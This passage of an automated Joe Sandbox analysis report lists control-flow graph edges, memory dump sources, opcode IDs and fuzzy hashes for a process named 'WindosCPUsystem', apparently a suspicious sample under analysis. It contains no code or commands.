7ff8490dd210-7ff8490dd217 1617->1619 1617->1620 1618->1565 1619->1539 1623 7ff8490dd21d-7ff8490dd238 1619->1623 1625 7ff8490dd3e8-7ff8490dd416 1620->1625 1624 7ff8490dd23e 1623->1624 1623->1625 1624->1565 1625->1539
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f2deeb96ea68f19a1ae808a66b65ba0a5bdc9454c4c151655862442d32a24cce
                                                                                                        • Instruction ID: c0631dfd5d6a16700b3f7d1c0f41439cb1b10e403cc4599d446f827b0e221d58
                                                                                                        • Opcode Fuzzy Hash: f2deeb96ea68f19a1ae808a66b65ba0a5bdc9454c4c151655862442d32a24cce
                                                                                                        • Instruction Fuzzy Hash: 8A420C30A0CE9A4FEB69AF7884142B977D2FFA5391F14467AD04AC36C6DF28E8418740

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 7ff8490d5140-7ff8490d514c 1 7ff8490d5196 0->1 2 7ff8490d514e-7ff8490d5177 call 7ff8490d0968 0->2 3 7ff8490d519a-7ff8490d51ac 1->3 5 7ff8490d517c-7ff8490d518b 2->5 7 7ff8490d51e3-7ff8490d51f5 3->7 8 7ff8490d51ae-7ff8490d51c0 3->8 5->8 14 7ff8490d518d-7ff8490d5194 5->14 12 7ff8490d51f7-7ff8490d51fa 7->12 13 7ff8490d5271-7ff8490d5274 7->13 10 7ff8490d51c2-7ff8490d51c5 8->10 11 7ff8490d523c-7ff8490d523d 8->11 15 7ff8490d51c7 10->15 16 7ff8490d5241 10->16 17 7ff8490d523e-7ff8490d5240 11->17 18 7ff8490d5276 12->18 19 7ff8490d51fc 12->19 13->18 14->3 24 7ff8490d520d-7ff8490d5219 15->24 25 7ff8490d51c9-7ff8490d51cd 15->25 22 7ff8490d5242-7ff8490d524c 16->22 17->16 20 7ff8490d52f7-7ff8490d52fb 18->20 21 7ff8490d5278-7ff8490d5294 18->21 19->22 23 7ff8490d51fe-7ff8490d5209 19->23 30 7ff8490d5301-7ff8490d531f 20->30 31 7ff8490d53bd-7ff8490d53cf 20->31 32 7ff8490d529a-7ff8490d52a5 21->32 35 7ff8490d524e 22->35 40 7ff8490d524f-7ff8490d5254 23->40 41 7ff8490d520b 23->41 27 7ff8490d521a-7ff8490d522d 24->27 28 7ff8490d525b-7ff8490d5261 24->28 25->17 29 7ff8490d51cf-7ff8490d51d2 25->29 27->28 55 7ff8490d522f-7ff8490d5236 27->55 36 7ff8490d52d2-7ff8490d52d6 28->36 37 7ff8490d5263-7ff8490d5268 28->37 34 7ff8490d51d4 29->34 29->35 30->31 53 7ff8490d53d5-7ff8490d53d8 31->53 54 7ff8490d54fd-7ff8490d5500 31->54 34->27 44 7ff8490d51d6-7ff8490d51e1 34->44 35->28 35->40 47 7ff8490d52dc 36->47 48 7ff8490d590e-7ff8490d5920 36->48 45 7ff8490d52e9-7ff8490d52f6 37->45 46 7ff8490d526a-7ff8490d526f 37->46 40->28 50 7ff8490d5256 call 7ff8490d0a18 40->50 41->24 44->28 46->13 49 7ff8490d52e0 46->49 47->49 58 7ff8490d5922-7ff8490d5978 48->58 56 7ff8490d52e6-7ff8490d52e7 49->56 57 7ff8490d54f0-7ff8490d54fc 49->57 50->28 59 7ff8490d53de-7ff8490d53e1 53->59 60 7ff8490d5718-7ff8490d5721 53->60 54->57 61 7ff8490d5502-7ff8490d5505 54->61 55->11 56->45 116 7ff8490d59c2-7ff8490d5a2a call 7ff8490d5140 58->116 117 7ff8490d597a-7ff8490d59a3 58->117 65 7ff8490d5676-7ff8490d567f 59->65 66 7ff8490d53e7-7ff8490d53ea 59->66 62 7ff8490d5723-7ff8490d5739 60->62 63 7ff8490d573b-7ff8490d574f 60->63 67 7ff8490d5601-7ff8490d560a 61->67 68 7ff8490d550b-7ff8490d5511 61->68 62->63 89 7ff8490d5751-7ff8490d5765 63->89 90 7ff8490d57ac 63->90 75 7ff8490d5681-7ff8490d5697 65->75 76 7ff8490d5699-7ff8490d56ad 65->76 70 7ff8490d53f0-7ff8490d53f9 66->70 71 7ff8490d57cb-7ff8490d5806 66->71 73 7ff8490d5623-7ff8490d5639 67->73 74 7ff8490d560c-7ff8490d5619 67->74 68->71 72 7ff8490d5517-7ff8490d5520 68->72 79 7ff8490d5413-7ff8490d5427 70->79 80 7ff8490d53fb-7ff8490d5411 70->80 123 7ff8490d580d-7ff8490d5810 71->123 81 7ff8490d5522-7ff8490d552f 72->81 82 7ff8490d5539-7ff8490d554f 72->82 98 7ff8490d5658 73->98 99 7ff8490d563b-7ff8490d5656 call 7ff8490d0960 73->99 74->73 93 7ff8490d561b-7ff8490d5621 74->93 75->76 95 7ff8490d56af-7ff8490d56c3 76->95 96 7ff8490d570a 76->96 112 7ff8490d57c1 79->112 113 7ff8490d542d-7ff8490d5441 79->113 80->79 81->82 103 7ff8490d5531-7ff8490d5537 81->103 106 7ff8490d5555-7ff8490d556b 82->106 107 7ff8490d566b-7ff8490d5671 82->107 119 7ff8490d5767-7ff8490d577b 89->119 120 7ff8490d577d-7ff8490d57a6 call 7ff8490d0960 89->120 101 7ff8490d57b1-7ff8490d57b5 90->101 93->73 132 7ff8490d56c5-7ff8490d56d9 95->132 133 7ff8490d56db-7ff8490d5704 call 7ff8490d0960 95->133 105 7ff8490d570f-7ff8490d5713 96->105 108 7ff8490d565d-7ff8490d5661 98->108 99->108 110 7ff8490d55f4-7ff8490d55f6 101->110 103->82 105->110 106->107 136 7ff8490d5571-7ff8490d5581 106->136 118 7ff8490d55d3-7ff8490d55d9 107->118 108->110 122 7ff8490d55fc 110->122 110->123 112->71 134 7ff8490d5443-7ff8490d5457 113->134 135 7ff8490d545d-7ff8490d5484 call 7ff8490d0960 113->135 117->116 118->110 131 7ff8490d55db-7ff8490d55ee 118->131 119->120 145 7ff8490d57a8-7ff8490d57aa 119->145 120->101 122->57 129 7ff8490d5812-7ff8490d5818 123->129 130 7ff8490d581a-7ff8490d5879 123->130 129->130 138 7ff8490d5880-7ff8490d58d6 129->138 130->138 131->82 131->110 132->133 155 7ff8490d5706-7ff8490d5708 132->155 133->105 134->135 156 7ff8490d57ba-7ff8490d57bc 134->156 167 7ff8490d5487-7ff8490d548d 135->167 157 7ff8490d55b7-7ff8490d55d0 call 7ff8490d0960 136->157 158 7ff8490d5583-7ff8490d5599 136->158 138->58 189 7ff8490d58d8-7ff8490d5907 138->189 145->101 155->105 156->167 157->118 158->157 177 7ff8490d559b-7ff8490d55b1 158->177 167->110 171 7ff8490d5493-7ff8490d5499 167->171 178 7ff8490d54ac-7ff8490d54af 171->178 179 7ff8490d549b-7ff8490d54ab 171->179 177->157 190 7ff8490d5663-7ff8490d5666 177->190 178->57 184 7ff8490d54b1-7ff8490d54ea 178->184 179->178 184->57 184->110 189->48 190->118
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 2_H
                                                                                                        • API String ID: 0-1234483377
                                                                                                        • Opcode ID: 81d607044dbb0d4dbdfda6f4414da5d540b8ba5da448b5fd7c9eeb65dab29c91
                                                                                                        • Instruction ID: 8f57b3428f44463300a995072e34a5ff92eec974842fd9c00502165e123ea92a
                                                                                                        • Opcode Fuzzy Hash: 81d607044dbb0d4dbdfda6f4414da5d540b8ba5da448b5fd7c9eeb65dab29c91
                                                                                                        • Instruction Fuzzy Hash: 2552BF31A1C9898FEFA4EF2CD459A7837E5FF59340B1402BAD84EC72A6DE24EC458741

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 197 7ff8490d7366-7ff8490d7372 199 7ff8490d7374-7ff8490d73a7 197->199 200 7ff8490d73bc-7ff8490d73c5 197->200 202 7ff8490d73c7 200->202 203 7ff8490d73cd 200->203 202->203 204 7ff8490d73d0-7ff8490d74d2 call 7ff8490d2600 call 7ff8490d26f0 call 7ff8490d2c20 203->204 205 7ff8490d73cf 203->205 219 7ff8490d75d4-7ff8490d7641 call 7ff8490d1bb0 * 2 call 7ff8490d1de0 204->219 220 7ff8490d74d8-7ff8490d74eb 204->220 205->204 249 7ff8490d7786-7ff8490d77a4 call 7ff8490d6660 219->249 250 7ff8490d7647-7ff8490d765e 219->250 224 7ff8490d7543-7ff8490d7571 call 7ff8490d1bb0 call 7ff8490d1210 call 7ff8490d09b0 220->224 225 7ff8490d74ed-7ff8490d74f1 220->225 242 7ff8490d75b6-7ff8490d75cf 224->242 243 7ff8490d7573-7ff8490d758f 224->243 225->219 227 7ff8490d74f7-7ff8490d7513 225->227 227->219 238 7ff8490d7519-7ff8490d753e 227->238 238->219 242->219 243->242 251 7ff8490d7591-7ff8490d75ae 243->251 262 7ff8490d7b03-7ff8490d7b0e 249->262 263 7ff8490d77aa-7ff8490d77ff call 7ff8490d1210 call 7ff8490d5140 249->263 256 7ff8490d7660-7ff8490d766e 250->256 257 7ff8490d7678-7ff8490d7695 call 7ff8490d1bb0 250->257 251->242 256->257 264 7ff8490d7670-7ff8490d7676 256->264 265 7ff8490d79a9-7ff8490d79ee call 7ff8490d1210 call 7ff8490d6010 call 7ff8490d09e8 257->265 266 7ff8490d769b-7ff8490d76f3 call 7ff8490d1210 call 7ff8490d6010 call 7ff8490d1bb0 call 7ff8490d5a50 call 7ff8490d1de0 257->266 269 7ff8490d7b10-7ff8490d7b3c 262->269 270 7ff8490d7ab9-7ff8490d7ae0 262->270 297 7ff8490d7804-7ff8490d789a call 7ff8490d08f0 call 7ff8490d1b00 call 7ff8490d27b0 call 7ff8490d6010 call 7ff8490d09d0 263->297 264->257 310 7ff8490d79f4-7ff8490d7a0d call 7ff8490d1bb0 265->310 311 7ff8490d7af7-7ff8490d7afe 265->311 302 7ff8490d7931-7ff8490d79a2 266->302 323 7ff8490d76f9-7ff8490d7717 266->323 282 7ff8490d7b3e-7ff8490d7b4e call 7ff8490d5140 269->282 283 7ff8490d7b79-7ff8490d7bc0 269->283 286 7ff8490d7ae6 270->286 287 7ff8490d7a59-7ff8490d7a64 270->287 282->297 295 7ff8490d7757-7ff8490d7780 286->295 291 7ff8490d792c 287->291 292 7ff8490d7a6a-7ff8490d7ab3 287->292 291->302 292->270 295->249 295->250 344 7ff8490d789c-7ff8490d78b8 297->344 345 7ff8490d78df-7ff8490d78e2 297->345 302->265 310->291 324 7ff8490d7a13-7ff8490d7a27 310->324 315 7ff8490d7a2d-7ff8490d7a53 call 7ff8490d09f0 call 7ff8490d1de0 311->315 315->287 315->295 323->291 328 7ff8490d771d-7ff8490d7750 323->328 324->315 329 7ff8490d7aeb-7ff8490d7af2 324->329 328->295 329->310 344->345 353 7ff8490d78ba-7ff8490d78d7 344->353 347 7ff8490d7b53-7ff8490d7b75 call 7ff8490d7b76 call 7ff8490d7bc1 345->347 348 7ff8490d78e8-7ff8490d78fb 345->348 347->283 348->347 355 7ff8490d7901-7ff8490d7927 call 7ff8490d1210 call 7ff8490d0a28 call 7ff8490d27b0 348->355 353->345 355->347
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >N]H
                                                                                                        • API String ID: 0-1017518847
                                                                                                        • Opcode ID: dcad8c02a6ac0caaeb884d4aa7dd5d30b492100a1a50c550f74d0928b7a4b2bb
                                                                                                        • Instruction ID: 18a0d1e2ab8b96ba6e9421f231ec61d401bc7c260ff2c7ba3172bd1f81f37200
                                                                                                        • Opcode Fuzzy Hash: dcad8c02a6ac0caaeb884d4aa7dd5d30b492100a1a50c550f74d0928b7a4b2bb
                                                                                                        • Instruction Fuzzy Hash: A1529270A1CA598FEFA8EF2894556A977E5FF99340F1402B9D04DC3296DE34EC42CB81

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 470 7ff8490db535-7ff8490db557 472 7ff8490db56e-7ff8490db62f call 7ff8490dafc0 470->472 473 7ff8490db559-7ff8490db55c 470->473 484 7ff8490db694-7ff8490db6a3 472->484 485 7ff8490db631-7ff8490db670 call 7ff8490d92a0 472->485 473->472 474 7ff8490db55e-7ff8490db56d 473->474 488 7ff8490db6a5-7ff8490db6b9 484->488 489 7ff8490db714-7ff8490db72a 484->489 498 7ff8490db675-7ff8490db67d call 7ff8490d0a68 485->498 492 7ff8490db6cf-7ff8490db6d7 488->492 489->492 497 7ff8490db72c-7ff8490db751 489->497 495 7ff8490dbc64-7ff8490dbc69 492->495 496 7ff8490db6dd-7ff8490db6ed 492->496 496->495 499 7ff8490db6f3-7ff8490db706 496->499 506 7ff8490db753-7ff8490db763 call 7ff8490d26f0 497->506 507 7ff8490db76a-7ff8490db896 call 7ff8490d26f0 call 7ff8490d92a0 call 7ff8490d27b0 call 7ff8490d1bb0 call 7ff8490d7cf0 497->507 504 7ff8490db682-7ff8490db693 498->504 499->495 502 7ff8490db70c-7ff8490db712 499->502 502->489 506->507 529 7ff8490db89c-7ff8490db8b3 507->529 530 7ff8490db9e8-7ff8490dba16 call 7ff8490d6660 call 7ff8490d5970 call 7ff8490d1210 507->530 535 7ff8490db8b5-7ff8490db8c3 529->535 536 7ff8490db8cd-7ff8490db8ea call 7ff8490d1bb0 529->536 551 7ff8490dba82 530->551 552 7ff8490dba18-7ff8490dba7e call 7ff8490d5140 call 7ff8490d1210 530->552 535->536 542 7ff8490db8c5-7ff8490db8cb 535->542 544 7ff8490dbb05-7ff8490dbb44 call 7ff8490d1210 call 7ff8490d6010 call 7ff8490d09e8 536->544 545 7ff8490db8f0-7ff8490db948 call 7ff8490d1210 call 7ff8490d6010 call 7ff8490d1bb0 call 7ff8490d5a50 call 7ff8490d1de0 536->545 542->536 573 7ff8490dbb46-7ff8490dbb56 call 7ff8490d1bb0 544->573 574 7ff8490dbb70-7ff8490dbb90 call 7ff8490d09f0 call 7ff8490d1de0 544->574 587 7ff8490dba8d-7ff8490dbabc 545->587 588 7ff8490db94e-7ff8490db966 545->588 556 7ff8490dba83 551->556 552->556 560 7ff8490dbc41-7ff8490dbc63 call 7ff8490dbc6a call 7ff8490dbcb5 556->560 584 7ff8490dbb5c-7ff8490dbb6e 573->584 585 7ff8490dba88 573->585 592 7ff8490dbb96-7ff8490dbb9a 574->592 593 7ff8490db9b9-7ff8490db9e2 574->593 584->573 584->574 585->587 607 7ff8490dbac0-7ff8490dbad6 587->607 588->585 589 7ff8490db96c-7ff8490db9b4 call 7ff8490d27b0 call 7ff8490d1de0 588->589 589->593 592->585 594 7ff8490dbba0-7ff8490dbc36 call 7ff8490d27b0 call 7ff8490d1de0 592->594 593->529 593->530 594->592 616 7ff8490dbc3c 594->616 611 7ff8490dbad8-7ff8490dbafe 607->611 611->544 616->560 616->593
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8_H
                                                                                                        • API String ID: 0-1141063015
                                                                                                        • Opcode ID: 979966ae159a1f04dc9d082a0f56c12e40a42c9c1c51725875642794b71a17a5
                                                                                                        • Instruction ID: f2d849d66881e6b08ae497f32e58dd590eceec98366a658d5fe9ed0742b85fdd
                                                                                                        • Opcode Fuzzy Hash: 979966ae159a1f04dc9d082a0f56c12e40a42c9c1c51725875642794b71a17a5
                                                                                                        • Instruction Fuzzy Hash: B832B330A1CA594FEBA8EB2CD455AB977E1FF59740F1042B9D04EC7296DE34EC428B81

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 617 7ff8490d73a9-7ff8490d73b7 618 7ff8490d73b9 617->618 619 7ff8490d73ba-7ff8490d73c5 617->619 618->619 621 7ff8490d73c7 619->621 622 7ff8490d73cd 619->622 621->622 623 7ff8490d73d0-7ff8490d73dd 622->623 624 7ff8490d73cf 622->624 625 7ff8490d73df-7ff8490d7430 call 7ff8490d2600 623->625 624->623 627 7ff8490d7435-7ff8490d74d2 call 7ff8490d26f0 call 7ff8490d2c20 625->627 638 7ff8490d75d4-7ff8490d7614 call 7ff8490d1bb0 * 2 call 7ff8490d1de0 627->638 639 7ff8490d74d8-7ff8490d74eb 627->639 656 7ff8490d7619-7ff8490d761e 638->656 643 7ff8490d7543-7ff8490d7571 call 7ff8490d1bb0 call 7ff8490d1210 call 7ff8490d09b0 639->643 644 7ff8490d74ed-7ff8490d74f1 639->644 661 7ff8490d75b6-7ff8490d75cf 643->661 662 7ff8490d7573-7ff8490d758f 643->662 644->638 646 7ff8490d74f7-7ff8490d7513 644->646 646->638 657 7ff8490d7519-7ff8490d753e 646->657 663 7ff8490d7626-7ff8490d7641 656->663 657->638 661->638 662->661 670 7ff8490d7591-7ff8490d75ae 662->670 668 7ff8490d7786-7ff8490d77a4 call 7ff8490d6660 663->668 669 7ff8490d7647-7ff8490d765e 663->669 681 7ff8490d7b03-7ff8490d7b0e 668->681 682 7ff8490d77aa-7ff8490d77ff call 7ff8490d1210 call 7ff8490d5140 668->682 675 7ff8490d7660-7ff8490d766e 669->675 676 7ff8490d7678-7ff8490d7695 call 7ff8490d1bb0 669->676 670->661 675->676 683 7ff8490d7670-7ff8490d7676 675->683 684 7ff8490d79a9-7ff8490d79ee call 7ff8490d1210 call 7ff8490d6010 call 7ff8490d09e8 676->684 685 7ff8490d769b-7ff8490d76f3 call 7ff8490d1210 call 7ff8490d6010 call 7ff8490d1bb0 call 7ff8490d5a50 call 7ff8490d1de0 676->685 688 7ff8490d7b10-7ff8490d7b3c 681->688 689 7ff8490d7ab9-7ff8490d7ae0 681->689 716 7ff8490d7804-7ff8490d789a call 7ff8490d08f0 call 7ff8490d1b00 call 7ff8490d27b0 call 7ff8490d6010 call 7ff8490d09d0 682->716 683->676 729 7ff8490d79f4-7ff8490d7a0d call 7ff8490d1bb0 684->729 730 7ff8490d7af7-7ff8490d7afe 684->730 721 7ff8490d7931-7ff8490d79a2 685->721 742 7ff8490d76f9-7ff8490d7717 685->742 701 7ff8490d7b3e-7ff8490d7b4e call 7ff8490d5140 688->701 702 7ff8490d7b79-7ff8490d7bc0 688->702 705 7ff8490d7ae6 689->705 706 7ff8490d7a59-7ff8490d7a64 689->706 701->716 714 7ff8490d7757-7ff8490d7780 705->714 710 7ff8490d792c 706->710 711 7ff8490d7a6a-7ff8490d7ab3 706->711 710->721 711->689 714->668 714->669 763 7ff8490d789c-7ff8490d78b8 716->763 764 7ff8490d78df-7ff8490d78e2 716->764 721->684 729->710 743 7ff8490d7a13-7ff8490d7a27 729->743 734 7ff8490d7a2d-7ff8490d7a53 call 7ff8490d09f0 call 7ff8490d1de0 730->734 734->706 734->714 742->710 747 7ff8490d771d-7ff8490d7728 742->747 743->734 748 7ff8490d7aeb-7ff8490d7af2 743->748 751 7ff8490d772a-7ff8490d7750 747->751 748->729 751->714 763->764 772 7ff8490d78ba-7ff8490d78d7 763->772 766 7ff8490d7b53-7ff8490d7b75 call 7ff8490d7b76 call 7ff8490d7bc1 764->766 767 7ff8490d78e8-7ff8490d78fb 764->767 766->702 767->766 774 7ff8490d7901-7ff8490d7927 call 7ff8490d1210 call 7ff8490d0a28 call 7ff8490d27b0 767->774 772->764 774->766
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >N]H
                                                                                                        • API String ID: 0-1017518847
                                                                                                        • Opcode ID: 607e952ec39895717cffbbd2bdb069c2d201021af41590bad400883aa1e9219b
                                                                                                        • Instruction ID: 9b069579ba33cd86d585dddbcc28b270012990cec2b6307be7b1dcc6e6cd2261
                                                                                                        • Opcode Fuzzy Hash: 607e952ec39895717cffbbd2bdb069c2d201021af41590bad400883aa1e9219b
                                                                                                        • Instruction Fuzzy Hash: 8A028230A1CA994FDFA9EB2C94557A977E2FF99740F0402B9D04DC7296DE24EC42CB81

                                                                                                        Control-flow Graph

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2759182561.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff848f30000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 61b393a46b10673441e631b44939a49606840d0fe2c54d73b29bd179df6b4989
                                                                                                        • Instruction ID: 4348ed79da34614535a2499dbf27fbafffad97c00abf10b4c8d4f4e6a7b5e9df
                                                                                                        • Opcode Fuzzy Hash: 61b393a46b10673441e631b44939a49606840d0fe2c54d73b29bd179df6b4989
                                                                                                        • Instruction Fuzzy Hash: 9FF18C7081DA8D8FDB85EF68C855AEDBBF0FF69300F0441AAD449D7292DB34A985CB41
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5889c89877ee541c7798c2c21edbab54086a32c1e8c6ff7f04360cf8fe24a85c
                                                                                                        • Instruction ID: f46cd2bd209fcd344a5dbe4c0598ebe9274aeb3eafba94f1c6278219acbfddc8
                                                                                                        • Opcode Fuzzy Hash: 5889c89877ee541c7798c2c21edbab54086a32c1e8c6ff7f04360cf8fe24a85c
                                                                                                        • Instruction Fuzzy Hash: 9D622661D1D6C64FEBBDAB2848169B53BE4EF56390F0806BDC48DC75E3ED1CA80A8741

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1633 7ff8490d000a-7ff8490d00c0 1639 7ff8490d00c7-7ff8490d00d2 1633->1639 1640 7ff8490d018d-7ff8490d0191 1639->1640 1641 7ff8490d00d8-7ff8490d00e4 1639->1641 1644 7ff8490d021b-7ff8490d023b 1640->1644 1642 7ff8490d0196-7ff8490d0198 1641->1642 1643 7ff8490d00ea-7ff8490d00ee 1641->1643 1646 7ff8490d01ca-7ff8490d01d0 1642->1646 1647 7ff8490d019a-7ff8490d01ad 1642->1647 1643->1642 1645 7ff8490d00f4-7ff8490d00f6 1643->1645 1672 7ff8490d0256-7ff8490d026a 1644->1672 1673 7ff8490d023d-7ff8490d0240 1644->1673 1650 7ff8490d0128-7ff8490d012e 1645->1650 1651 7ff8490d00f8-7ff8490d010b 1645->1651 1648 7ff8490d0214-7ff8490d0219 1646->1648 1649 7ff8490d01d2-7ff8490d01da 1646->1649 1653 7ff8490d05d2-7ff8490d0614 1647->1653 1654 7ff8490d01b3-7ff8490d01c4 1647->1654 1648->1644 1657 7ff8490d0242-7ff8490d0246 1648->1657 1649->1653 1655 7ff8490d01e0-7ff8490d0201 1649->1655 1658 7ff8490d0130-7ff8490d0156 1650->1658 1659 7ff8490d016a-7ff8490d0173 1650->1659 1651->1653 1656 7ff8490d0111-7ff8490d0122 1651->1656 1674 7ff8490d0616-7ff8490d0625 1653->1674 1654->1646 1660 7ff8490d03bf-7ff8490d0469 1654->1660 1666 7ff8490d0203-7ff8490d0210 1655->1666 1667 7ff8490d024b-7ff8490d0254 1655->1667 1656->1650 1656->1660 1657->1642 1669 7ff8490d0182-7ff8490d018b 1658->1669 1670 7ff8490d0158-7ff8490d0166 1658->1670 1659->1645 1664 7ff8490d0179-7ff8490d017d 1659->1664 1680 7ff8490d0470-7ff8490d04d0 1660->1680 1664->1644 1666->1648 1667->1648 1669->1659 1670->1659 1675 7ff8490d0270-7ff8490d02b7 1672->1675 1672->1680 1673->1675 1677 7ff8490d0707-7ff8490d0709 1674->1677 1678 7ff8490d062b-7ff8490d0637 1674->1678 1717 7ff8490d02c4-7ff8490d02db 1675->1717 1718 7ff8490d02b9-7ff8490d02bf 1675->1718 1677->1674 1683 7ff8490d070f-7ff8490d071f 1677->1683 1684 7ff8490d06a5-7ff8490d06ac 1678->1684 1685 7ff8490d0639-7ff8490d0640 1678->1685 1737 7ff8490d04d7-7ff8490d0583 1680->1737 1688 7ff8490d0720-7ff8490d0735 1684->1688 1689 7ff8490d06ae-7ff8490d06c0 1684->1689 1685->1684 1687 7ff8490d0642-7ff8490d0649 1685->1687 1687->1688 1693 7ff8490d064f-7ff8490d0661 1687->1693 1705 7ff8490d0737-7ff8490d073e 1688->1705 1706 7ff8490d073f-7ff8490d074d 1688->1706 1694 7ff8490d0700-7ff8490d0705 1689->1694 1695 7ff8490d06c2-7ff8490d06d2 1689->1695 1698 7ff8490d0663-7ff8490d0674 1693->1698 1699 7ff8490d069c-7ff8490d06a1 1693->1699 1694->1677 1694->1684 1695->1688 1700 7ff8490d06d4-7ff8490d06dc 1695->1700 1698->1688 1707 7ff8490d067a-7ff8490d0697 1698->1707 1699->1687 1701 7ff8490d06a3 1699->1701 1700->1688 1708 7ff8490d06de-7ff8490d06fb 1700->1708 1701->1677 1705->1706 1715 7ff8490d074e 1706->1715 1716 7ff8490d074f-7ff8490d0758 1706->1716 1707->1699 1708->1694 1715->1716 1719 7ff8490d07a2-7ff8490d07b3 1716->1719 1720 7ff8490d075a-7ff8490d0767 1716->1720 1717->1737 1738 7ff8490d02e1-7ff8490d02f0 1717->1738 1718->1717 1727 7ff8490d02c1-7ff8490d02c2 1718->1727 1724 7ff8490d07b5-7ff8490d07c5 1719->1724 1725 7ff8490d07c6-7ff8490d07c9 1719->1725 1720->1719 1724->1725 1730 7ff8490d07ee-7ff8490d07f5 1725->1730 1731 7ff8490d07cb-7ff8490d07df 1725->1731 1727->1717 1737->1653
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: adbb3c86b7ce92222a05a7bd3a4bc73e4bceed6b59e4583e95311332ce08f728
                                                                                                        • Instruction ID: c6f168423e2fda8746304e781afce710cb448d6e7b44489ba09347d1acd45bc1
                                                                                                        • Opcode Fuzzy Hash: adbb3c86b7ce92222a05a7bd3a4bc73e4bceed6b59e4583e95311332ce08f728
                                                                                                        • Instruction Fuzzy Hash: D1325630E1DA865FE766EE2898855757BF4FF55380F0406B9D48EC7186DE28FC028782

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
